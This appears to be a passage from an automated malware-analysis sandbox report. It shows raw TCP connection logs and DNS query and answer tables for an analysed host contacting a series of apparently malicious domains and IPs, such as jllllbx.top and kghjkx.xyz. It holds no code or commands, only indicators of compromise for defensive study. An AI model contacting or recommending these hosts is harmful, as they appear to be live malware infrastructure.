                                                                                                                            Nov 7, 2024 10:52:43.626274109 CET4920480192.168.2.22206.119.81.36
                                                                                                                            Nov 7, 2024 10:52:43.631691933 CET8049204206.119.81.36192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:43.631752014 CET4920480192.168.2.22206.119.81.36
                                                                                                                            Nov 7, 2024 10:52:43.637758970 CET4920480192.168.2.22206.119.81.36
                                                                                                                            Nov 7, 2024 10:52:43.643013000 CET8049204206.119.81.36192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:46.164573908 CET4920580192.168.2.22206.119.81.36
                                                                                                                            Nov 7, 2024 10:52:46.169677973 CET8049205206.119.81.36192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:46.172455072 CET4920580192.168.2.22206.119.81.36
                                                                                                                            Nov 7, 2024 10:52:46.177624941 CET8049205206.119.81.36192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:46.181489944 CET4920580192.168.2.22206.119.81.36
                                                                                                                            Nov 7, 2024 10:52:46.181489944 CET4920580192.168.2.22206.119.81.36
                                                                                                                            Nov 7, 2024 10:52:46.186405897 CET8049205206.119.81.36192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:46.186511993 CET8049205206.119.81.36192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:48.707431078 CET4920680192.168.2.22206.119.81.36
                                                                                                                            Nov 7, 2024 10:52:48.712575912 CET8049206206.119.81.36192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:48.712635040 CET4920680192.168.2.22206.119.81.36
                                                                                                                            Nov 7, 2024 10:52:48.719984055 CET4920680192.168.2.22206.119.81.36
                                                                                                                            Nov 7, 2024 10:52:48.724917889 CET8049206206.119.81.36192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:49.702600956 CET8049206206.119.81.36192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:49.886065006 CET8049206206.119.81.36192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:49.886271000 CET4920680192.168.2.22206.119.81.36
                                                                                                                            Nov 7, 2024 10:52:49.890480042 CET4920680192.168.2.22206.119.81.36
                                                                                                                            Nov 7, 2024 10:52:49.895981073 CET8049206206.119.81.36192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:54.906996012 CET4920780192.168.2.22142.250.185.115
                                                                                                                            Nov 7, 2024 10:52:55.265650034 CET8049207142.250.185.115192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:55.265716076 CET4920780192.168.2.22142.250.185.115
                                                                                                                            Nov 7, 2024 10:52:55.276846886 CET4920780192.168.2.22142.250.185.115
                                                                                                                            Nov 7, 2024 10:52:55.281717062 CET8049207142.250.185.115192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:55.281765938 CET4920780192.168.2.22142.250.185.115
                                                                                                                            Nov 7, 2024 10:52:55.281802893 CET8049207142.250.185.115192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:55.286612034 CET8049207142.250.185.115192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:56.137284994 CET8049207142.250.185.115192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:56.137314081 CET8049207142.250.185.115192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:56.137454987 CET4920780192.168.2.22142.250.185.115
                                                                                                                            Nov 7, 2024 10:52:56.266988039 CET8049207142.250.185.115192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:56.268577099 CET4920780192.168.2.22142.250.185.115
                                                                                                                            Nov 7, 2024 10:52:56.784571886 CET4920780192.168.2.22142.250.185.115
                                                                                                                            Nov 7, 2024 10:52:57.801529884 CET4920880192.168.2.22142.250.185.115
                                                                                                                            Nov 7, 2024 10:52:57.806672096 CET8049208142.250.185.115192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:57.814487934 CET4920880192.168.2.22142.250.185.115
                                                                                                                            Nov 7, 2024 10:52:57.822489977 CET4920880192.168.2.22142.250.185.115
                                                                                                                            Nov 7, 2024 10:52:57.827471018 CET8049208142.250.185.115192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:58.647708893 CET8049208142.250.185.115192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:58.648230076 CET8049208142.250.185.115192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:58.648287058 CET4920880192.168.2.22142.250.185.115
                                                                                                                            Nov 7, 2024 10:52:59.117046118 CET8049208142.250.185.115192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:59.117142916 CET4920880192.168.2.22142.250.185.115
                                                                                                                            Nov 7, 2024 10:52:59.118341923 CET8049208142.250.185.115192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:59.118377924 CET4920880192.168.2.22142.250.185.115
                                                                                                                            Nov 7, 2024 10:52:59.330049992 CET4920880192.168.2.22142.250.185.115
                                                                                                                            Nov 7, 2024 10:52:59.356739998 CET8049208142.250.185.115192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:59.356796980 CET4920880192.168.2.22142.250.185.115
                                                                                                                            Nov 7, 2024 10:53:00.343935013 CET4920980192.168.2.22142.250.185.115
                                                                                                                            Nov 7, 2024 10:53:00.348829985 CET8049209142.250.185.115192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:00.352509022 CET4920980192.168.2.22142.250.185.115
                                                                                                                            Nov 7, 2024 10:53:00.360677958 CET4920980192.168.2.22142.250.185.115
                                                                                                                            Nov 7, 2024 10:53:00.365679979 CET8049209142.250.185.115192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:00.365875959 CET8049209142.250.185.115192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:00.369112968 CET4920980192.168.2.22142.250.185.115
                                                                                                                            Nov 7, 2024 10:53:00.374109030 CET8049209142.250.185.115192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:00.374133110 CET8049209142.250.185.115192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:01.204752922 CET8049209142.250.185.115192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:01.204865932 CET8049209142.250.185.115192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:01.204906940 CET4920980192.168.2.22142.250.185.115
                                                                                                                            Nov 7, 2024 10:53:01.324395895 CET8049209142.250.185.115192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:01.324486017 CET4920980192.168.2.22142.250.185.115
                                                                                                                            Nov 7, 2024 10:53:01.872510910 CET4920980192.168.2.22142.250.185.115
                                                                                                                            Nov 7, 2024 10:53:02.891602993 CET4921080192.168.2.22142.250.185.115
                                                                                                                            Nov 7, 2024 10:53:02.896778107 CET8049210142.250.185.115192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:02.896867037 CET4921080192.168.2.22142.250.185.115
                                                                                                                            Nov 7, 2024 10:53:02.904683113 CET4921080192.168.2.22142.250.185.115
                                                                                                                            Nov 7, 2024 10:53:02.910547972 CET8049210142.250.185.115192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:03.748545885 CET8049210142.250.185.115192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:03.749058962 CET8049210142.250.185.115192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:03.749151945 CET4921080192.168.2.22142.250.185.115
                                                                                                                            Nov 7, 2024 10:53:03.868792057 CET8049210142.250.185.115192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:03.868911982 CET4921080192.168.2.22142.250.185.115
                                                                                                                            Nov 7, 2024 10:53:03.869728088 CET4921080192.168.2.22142.250.185.115
                                                                                                                            Nov 7, 2024 10:53:03.874548912 CET8049210142.250.185.115192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:08.892759085 CET4921180192.168.2.223.33.130.190
                                                                                                                            Nov 7, 2024 10:53:08.897855997 CET80492113.33.130.190192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:08.904556990 CET4921180192.168.2.223.33.130.190
                                                                                                                            Nov 7, 2024 10:53:08.913045883 CET4921180192.168.2.223.33.130.190
                                                                                                                            Nov 7, 2024 10:53:08.917944908 CET80492113.33.130.190192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:08.918040991 CET80492113.33.130.190192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:08.924796104 CET4921180192.168.2.223.33.130.190
                                                                                                                            Nov 7, 2024 10:53:08.929763079 CET80492113.33.130.190192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:09.739908934 CET80492113.33.130.190192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:09.739975929 CET4921180192.168.2.223.33.130.190
                                                                                                                            Nov 7, 2024 10:53:10.420627117 CET4921180192.168.2.223.33.130.190
                                                                                                                            Nov 7, 2024 10:53:10.426259995 CET80492113.33.130.190192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:11.449384928 CET4921280192.168.2.223.33.130.190
                                                                                                                            Nov 7, 2024 10:53:11.454430103 CET80492123.33.130.190192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:11.454503059 CET4921280192.168.2.223.33.130.190
                                                                                                                            Nov 7, 2024 10:53:11.472779989 CET4921280192.168.2.223.33.130.190
                                                                                                                            Nov 7, 2024 10:53:11.477716923 CET80492123.33.130.190192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:12.977421045 CET4921280192.168.2.223.33.130.190
                                                                                                                            Nov 7, 2024 10:53:12.983380079 CET80492123.33.130.190192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:12.983436108 CET4921280192.168.2.223.33.130.190
                                                                                                                            Nov 7, 2024 10:53:13.994844913 CET4921380192.168.2.223.33.130.190
                                                                                                                            Nov 7, 2024 10:53:14.001791000 CET80492133.33.130.190192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:14.001904964 CET4921380192.168.2.223.33.130.190
                                                                                                                            Nov 7, 2024 10:53:14.014554977 CET4921380192.168.2.223.33.130.190
                                                                                                                            Nov 7, 2024 10:53:14.020275116 CET80492133.33.130.190192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:14.020288944 CET80492133.33.130.190192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:14.025651932 CET4921380192.168.2.223.33.130.190
                                                                                                                            Nov 7, 2024 10:53:14.031306028 CET80492133.33.130.190192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:14.031653881 CET80492133.33.130.190192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:14.631133080 CET80492133.33.130.190192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:14.631203890 CET4921380192.168.2.223.33.130.190
                                                                                                                            Nov 7, 2024 10:53:15.520404100 CET4921380192.168.2.223.33.130.190
                                                                                                                            Nov 7, 2024 10:53:15.525316000 CET80492133.33.130.190192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:16.537653923 CET4921480192.168.2.223.33.130.190
                                                                                                                            Nov 7, 2024 10:53:16.542901039 CET80492143.33.130.190192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:16.544547081 CET4921480192.168.2.223.33.130.190
                                                                                                                            Nov 7, 2024 10:53:16.552550077 CET4921480192.168.2.223.33.130.190
                                                                                                                            Nov 7, 2024 10:53:16.557477951 CET80492143.33.130.190192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:17.170526981 CET80492143.33.130.190192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:17.171222925 CET80492143.33.130.190192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:17.171377897 CET4921480192.168.2.223.33.130.190
                                                                                                                            Nov 7, 2024 10:53:17.176687002 CET4921480192.168.2.223.33.130.190
                                                                                                                            Nov 7, 2024 10:53:17.181747913 CET80492143.33.130.190192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:22.187041998 CET4921580192.168.2.22154.23.184.95
                                                                                                                            Nov 7, 2024 10:53:22.191921949 CET8049215154.23.184.95192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:22.192048073 CET4921580192.168.2.22154.23.184.95
                                                                                                                            Nov 7, 2024 10:53:22.203635931 CET4921580192.168.2.22154.23.184.95
                                                                                                                            Nov 7, 2024 10:53:22.208532095 CET8049215154.23.184.95192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:22.208640099 CET4921580192.168.2.22154.23.184.95
                                                                                                                            Nov 7, 2024 10:53:22.208668947 CET8049215154.23.184.95192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:22.213445902 CET8049215154.23.184.95192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:23.156002045 CET8049215154.23.184.95192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:23.337511063 CET8049215154.23.184.95192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:23.337594986 CET4921580192.168.2.22154.23.184.95
                                                                                                                            Nov 7, 2024 10:53:23.723433018 CET4921580192.168.2.22154.23.184.95
                                                                                                                            Nov 7, 2024 10:53:24.728821993 CET4921680192.168.2.22154.23.184.95
                                                                                                                            Nov 7, 2024 10:53:24.733928919 CET8049216154.23.184.95192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:24.733994961 CET4921680192.168.2.22154.23.184.95
                                                                                                                            Nov 7, 2024 10:53:24.744441986 CET4921680192.168.2.22154.23.184.95
                                                                                                                            Nov 7, 2024 10:53:24.749551058 CET8049216154.23.184.95192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:25.682163000 CET8049216154.23.184.95192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:25.863586903 CET8049216154.23.184.95192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:25.870569944 CET4921680192.168.2.22154.23.184.95
                                                                                                                            Nov 7, 2024 10:53:26.253364086 CET4921680192.168.2.22154.23.184.95
                                                                                                                            Nov 7, 2024 10:53:27.270173073 CET4921780192.168.2.22154.23.184.95
                                                                                                                            Nov 7, 2024 10:53:27.275213003 CET8049217154.23.184.95192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:27.275276899 CET4921780192.168.2.22154.23.184.95
                                                                                                                            Nov 7, 2024 10:53:27.284322023 CET4921780192.168.2.22154.23.184.95
                                                                                                                            Nov 7, 2024 10:53:27.289403915 CET8049217154.23.184.95192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:27.289448023 CET8049217154.23.184.95192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:27.289467096 CET4921780192.168.2.22154.23.184.95
                                                                                                                            Nov 7, 2024 10:53:27.294466972 CET8049217154.23.184.95192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:27.294482946 CET8049217154.23.184.95192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:28.231308937 CET8049217154.23.184.95192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:28.431649923 CET8049217154.23.184.95192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:28.431718111 CET4921780192.168.2.22154.23.184.95
                                                                                                                            Nov 7, 2024 10:53:28.795895100 CET4921780192.168.2.22154.23.184.95
                                                                                                                            Nov 7, 2024 10:53:29.814609051 CET4921880192.168.2.22154.23.184.95
                                                                                                                            Nov 7, 2024 10:53:29.820091963 CET8049218154.23.184.95192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:29.820394993 CET4921880192.168.2.22154.23.184.95
                                                                                                                            Nov 7, 2024 10:53:29.830585003 CET4921880192.168.2.22154.23.184.95
                                                                                                                            Nov 7, 2024 10:53:29.835567951 CET8049218154.23.184.95192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:30.778723001 CET8049218154.23.184.95192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:30.960453987 CET8049218154.23.184.95192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:30.960649014 CET4921880192.168.2.22154.23.184.95
                                                                                                                            Nov 7, 2024 10:53:30.986860037 CET4921880192.168.2.22154.23.184.95
                                                                                                                            Nov 7, 2024 10:53:30.992095947 CET8049218154.23.184.95192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:36.017052889 CET4921980192.168.2.22185.27.134.144
                                                                                                                            Nov 7, 2024 10:53:36.022088051 CET8049219185.27.134.144192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:36.022140980 CET4921980192.168.2.22185.27.134.144
                                                                                                                            Nov 7, 2024 10:53:36.033199072 CET4921980192.168.2.22185.27.134.144
                                                                                                                            Nov 7, 2024 10:53:36.038121939 CET8049219185.27.134.144192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:36.038217068 CET4921980192.168.2.22185.27.134.144
                                                                                                                            Nov 7, 2024 10:53:36.038229942 CET8049219185.27.134.144192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:36.043179989 CET8049219185.27.134.144192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:36.838181019 CET8049219185.27.134.144192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:36.969353914 CET8049219185.27.134.144192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:36.974651098 CET4921980192.168.2.22185.27.134.144
                                                                                                                            Nov 7, 2024 10:53:37.382878065 CET8049219185.27.134.144192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:37.383193970 CET4921980192.168.2.22185.27.134.144
                                                                                                                            Nov 7, 2024 10:53:37.384191990 CET8049219185.27.134.144192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:37.384578943 CET4921980192.168.2.22185.27.134.144
                                                                                                                            Nov 7, 2024 10:53:37.547540903 CET4921980192.168.2.22185.27.134.144
                                                                                                                            Nov 7, 2024 10:53:38.565628052 CET4922080192.168.2.22185.27.134.144
                                                                                                                            Nov 7, 2024 10:53:38.570843935 CET8049220185.27.134.144192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:38.576734066 CET4922080192.168.2.22185.27.134.144
                                                                                                                            Nov 7, 2024 10:53:38.584611893 CET4922080192.168.2.22185.27.134.144
                                                                                                                            Nov 7, 2024 10:53:38.589656115 CET8049220185.27.134.144192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:39.405797005 CET8049220185.27.134.144192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:39.518435001 CET8049220185.27.134.144192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:39.518506050 CET4922080192.168.2.22185.27.134.144
                                                                                                                            Nov 7, 2024 10:53:40.090388060 CET4922080192.168.2.22185.27.134.144
                                                                                                                            Nov 7, 2024 10:53:41.108619928 CET4922180192.168.2.22185.27.134.144
                                                                                                                            Nov 7, 2024 10:53:41.114851952 CET8049221185.27.134.144192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:41.116767883 CET4922180192.168.2.22185.27.134.144
                                                                                                                            Nov 7, 2024 10:53:41.128685951 CET4922180192.168.2.22185.27.134.144
                                                                                                                            Nov 7, 2024 10:53:41.133924961 CET8049221185.27.134.144192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:41.134243965 CET8049221185.27.134.144192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:41.136815071 CET4922180192.168.2.22185.27.134.144
                                                                                                                            Nov 7, 2024 10:53:41.141881943 CET8049221185.27.134.144192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:41.142000914 CET8049221185.27.134.144192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:41.947027922 CET8049221185.27.134.144192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:42.059392929 CET8049221185.27.134.144192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:42.059478998 CET4922180192.168.2.22185.27.134.144
                                                                                                                            Nov 7, 2024 10:53:42.636778116 CET4922180192.168.2.22185.27.134.144
                                                                                                                            Nov 7, 2024 10:53:43.650360107 CET4922280192.168.2.22185.27.134.144
                                                                                                                            Nov 7, 2024 10:53:43.656265020 CET8049222185.27.134.144192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:43.656326056 CET4922280192.168.2.22185.27.134.144
                                                                                                                            Nov 7, 2024 10:53:43.667028904 CET4922280192.168.2.22185.27.134.144
                                                                                                                            Nov 7, 2024 10:53:43.671941042 CET8049222185.27.134.144192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:44.473948002 CET8049222185.27.134.144192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:44.584742069 CET8049222185.27.134.144192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:44.584974051 CET4922280192.168.2.22185.27.134.144
                                                                                                                            Nov 7, 2024 10:53:44.585743904 CET4922280192.168.2.22185.27.134.144
                                                                                                                            Nov 7, 2024 10:53:44.590558052 CET8049222185.27.134.144192.168.2.22
                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                            Nov 7, 2024 10:50:06.081578970 CET5456253192.168.2.228.8.8.8
                                                                                                                            Nov 7, 2024 10:50:06.760551929 CET53545628.8.8.8192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:12.405417919 CET5291753192.168.2.228.8.8.8
                                                                                                                            Nov 7, 2024 10:50:12.414874077 CET53529178.8.8.8192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:22.961771965 CET6275153192.168.2.228.8.8.8
                                                                                                                            Nov 7, 2024 10:50:23.146230936 CET53627518.8.8.8192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:36.700890064 CET5789353192.168.2.228.8.8.8
                                                                                                                            Nov 7, 2024 10:50:36.712409973 CET53578938.8.8.8192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:49.997296095 CET5482153192.168.2.228.8.8.8
                                                                                                                            Nov 7, 2024 10:50:50.007903099 CET53548218.8.8.8192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:03.925175905 CET5471953192.168.2.228.8.8.8
                                                                                                                            Nov 7, 2024 10:51:03.936602116 CET53547198.8.8.8192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:17.252727985 CET4988153192.168.2.228.8.8.8
                                                                                                                            Nov 7, 2024 10:51:17.553637028 CET53498818.8.8.8192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:31.806749105 CET5499853192.168.2.228.8.8.8
                                                                                                                            Nov 7, 2024 10:51:31.872908115 CET53549988.8.8.8192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:45.482094049 CET5278153192.168.2.228.8.8.8
                                                                                                                            Nov 7, 2024 10:51:45.492676020 CET53527818.8.8.8192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:59.019342899 CET6392653192.168.2.228.8.8.8
                                                                                                                            Nov 7, 2024 10:51:59.028804064 CET53639268.8.8.8192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:12.969063997 CET6551053192.168.2.228.8.8.8
                                                                                                                            Nov 7, 2024 10:52:13.184391975 CET53655108.8.8.8192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:27.283009052 CET6267253192.168.2.228.8.8.8
                                                                                                                            Nov 7, 2024 10:52:27.290522099 CET53626728.8.8.8192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:40.772526026 CET5647553192.168.2.228.8.8.8
                                                                                                                            Nov 7, 2024 10:52:41.073148966 CET53564758.8.8.8192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:54.892074108 CET4938453192.168.2.228.8.8.8
                                                                                                                            Nov 7, 2024 10:52:54.904448986 CET53493848.8.8.8192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:08.881028891 CET5484253192.168.2.228.8.8.8
                                                                                                                            Nov 7, 2024 10:53:08.888133049 CET53548428.8.8.8192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:22.175662994 CET5810553192.168.2.228.8.8.8
                                                                                                                            Nov 7, 2024 10:53:22.184883118 CET53581058.8.8.8192.168.2.22
                                                                                                                            Nov 7, 2024 10:53:35.991974115 CET6492853192.168.2.228.8.8.8
                                                                                                                            Nov 7, 2024 10:53:36.014906883 CET53649288.8.8.8192.168.2.22
                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                            Nov 7, 2024 10:50:06.081578970 CET192.168.2.228.8.8.80xe649Standard query (0)www.jllllbx.topA (IP address)IN (0x0001)false
                                                                                                                            Nov 7, 2024 10:50:12.405417919 CET192.168.2.228.8.8.80xba54Standard query (0)www.sqlite.orgA (IP address)IN (0x0001)false
                                                                                                                            Nov 7, 2024 10:50:22.961771965 CET192.168.2.228.8.8.80xb5c0Standard query (0)www.college-help.infoA (IP address)IN (0x0001)false
                                                                                                                            Nov 7, 2024 10:50:36.700890064 CET192.168.2.228.8.8.80xc36fStandard query (0)www.binacamasala.comA (IP address)IN (0x0001)false
                                                                                                                            Nov 7, 2024 10:50:49.997296095 CET192.168.2.228.8.8.80x9a13Standard query (0)www.marketplacer.topA (IP address)IN (0x0001)false
                                                                                                                            Nov 7, 2024 10:51:03.925175905 CET192.168.2.228.8.8.80x95a0Standard query (0)www.energyparks.netA (IP address)IN (0x0001)false
                                                                                                                            Nov 7, 2024 10:51:17.252727985 CET192.168.2.228.8.8.80x7b50Standard query (0)www.yvrkp.topA (IP address)IN (0x0001)false
                                                                                                                            Nov 7, 2024 10:51:31.806749105 CET192.168.2.228.8.8.80x9418Standard query (0)www.flikka.siteA (IP address)IN (0x0001)false
                                                                                                                            Nov 7, 2024 10:51:45.482094049 CET192.168.2.228.8.8.80xadf2Standard query (0)www.ladylawher.shopA (IP address)IN (0x0001)false
                                                                                                                            Nov 7, 2024 10:51:59.019342899 CET192.168.2.228.8.8.80xe880Standard query (0)www.primeproperty.propertyA (IP address)IN (0x0001)false
                                                                                                                            Nov 7, 2024 10:52:12.969063997 CET192.168.2.228.8.8.80x8a8aStandard query (0)www.kghjkx.xyzA (IP address)IN (0x0001)false
                                                                                                                            Nov 7, 2024 10:52:27.283009052 CET192.168.2.228.8.8.80x74a2Standard query (0)www.iuyi542.xyzA (IP address)IN (0x0001)false
                                                                                                                            Nov 7, 2024 10:52:40.772526026 CET192.168.2.228.8.8.80xb64bStandard query (0)www.neg21.topA (IP address)IN (0x0001)false
                                                                                                                            Nov 7, 2024 10:52:54.892074108 CET192.168.2.228.8.8.80x8aa0Standard query (0)www.digitaladpro.shopA (IP address)IN (0x0001)false
                                                                                                                            Nov 7, 2024 10:53:08.881028891 CET192.168.2.228.8.8.80x9b25Standard query (0)www.loginov.enterprisesA (IP address)IN (0x0001)false
                                                                                                                            Nov 7, 2024 10:53:22.175662994 CET192.168.2.228.8.8.80xf915Standard query (0)www.wcp95.topA (IP address)IN (0x0001)false
                                                                                                                            Nov 7, 2024 10:53:35.991974115 CET192.168.2.228.8.8.80x2398Standard query (0)www.hasthosting.xyzA (IP address)IN (0x0001)false
                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                            Nov 7, 2024 10:50:06.760551929 CET8.8.8.8192.168.2.220xe649No error (0)www.jllllbx.top156.234.28.94A (IP address)IN (0x0001)false
                                                                                                                            Nov 7, 2024 10:50:12.414874077 CET8.8.8.8192.168.2.220xba54No error (0)www.sqlite.org45.33.6.223A (IP address)IN (0x0001)false
                                                                                                                            Nov 7, 2024 10:50:23.146230936 CET8.8.8.8192.168.2.220xb5c0No error (0)www.college-help.info38.88.82.56A (IP address)IN (0x0001)false
                                                                                                                            Nov 7, 2024 10:50:36.712409973 CET8.8.8.8192.168.2.220xc36fNo error (0)www.binacamasala.combinacamasala.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Nov 7, 2024 10:50:36.712409973 CET8.8.8.8192.168.2.220xc36fNo error (0)binacamasala.com15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                            Nov 7, 2024 10:50:36.712409973 CET8.8.8.8192.168.2.220xc36fNo error (0)binacamasala.com3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                            Nov 7, 2024 10:50:50.007903099 CET8.8.8.8192.168.2.220x9a13No error (0)www.marketplacer.top194.58.112.174A (IP address)IN (0x0001)false
                                                                                                                            Nov 7, 2024 10:51:03.936602116 CET8.8.8.8192.168.2.220x95a0No error (0)www.energyparks.netenergyparks.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Nov 7, 2024 10:51:03.936602116 CET8.8.8.8192.168.2.220x95a0No error (0)energyparks.net15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                            Nov 7, 2024 10:51:03.936602116 CET8.8.8.8192.168.2.220x95a0No error (0)energyparks.net3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                            Nov 7, 2024 10:51:17.553637028 CET8.8.8.8192.168.2.220x7b50No error (0)www.yvrkp.top104.21.14.183A (IP address)IN (0x0001)false
                                                                                                                            Nov 7, 2024 10:51:17.553637028 CET8.8.8.8192.168.2.220x7b50No error (0)www.yvrkp.top172.67.160.35A (IP address)IN (0x0001)false
                                                                                                                            Nov 7, 2024 10:51:31.872908115 CET8.8.8.8192.168.2.220x9418No error (0)www.flikka.site67.223.117.142A (IP address)IN (0x0001)false
                                                                                                                            Nov 7, 2024 10:51:45.492676020 CET8.8.8.8192.168.2.220xadf2No error (0)www.ladylawher.shopladylawher.shopCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Nov 7, 2024 10:51:45.492676020 CET8.8.8.8192.168.2.220xadf2No error (0)ladylawher.shop3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                            Nov 7, 2024 10:51:45.492676020 CET8.8.8.8192.168.2.220xadf2No error (0)ladylawher.shop15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                            Nov 7, 2024 10:51:59.028804064 CET8.8.8.8192.168.2.220xe880No error (0)www.primeproperty.propertydns.webcake.ioCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Nov 7, 2024 10:51:59.028804064 CET8.8.8.8192.168.2.220xe880No error (0)dns.webcake.io113.20.119.31A (IP address)IN (0x0001)false
                                                                                                                            Nov 7, 2024 10:52:13.184391975 CET8.8.8.8192.168.2.220x8a8aNo error (0)www.kghjkx.xyz47.129.103.185A (IP address)IN (0x0001)false
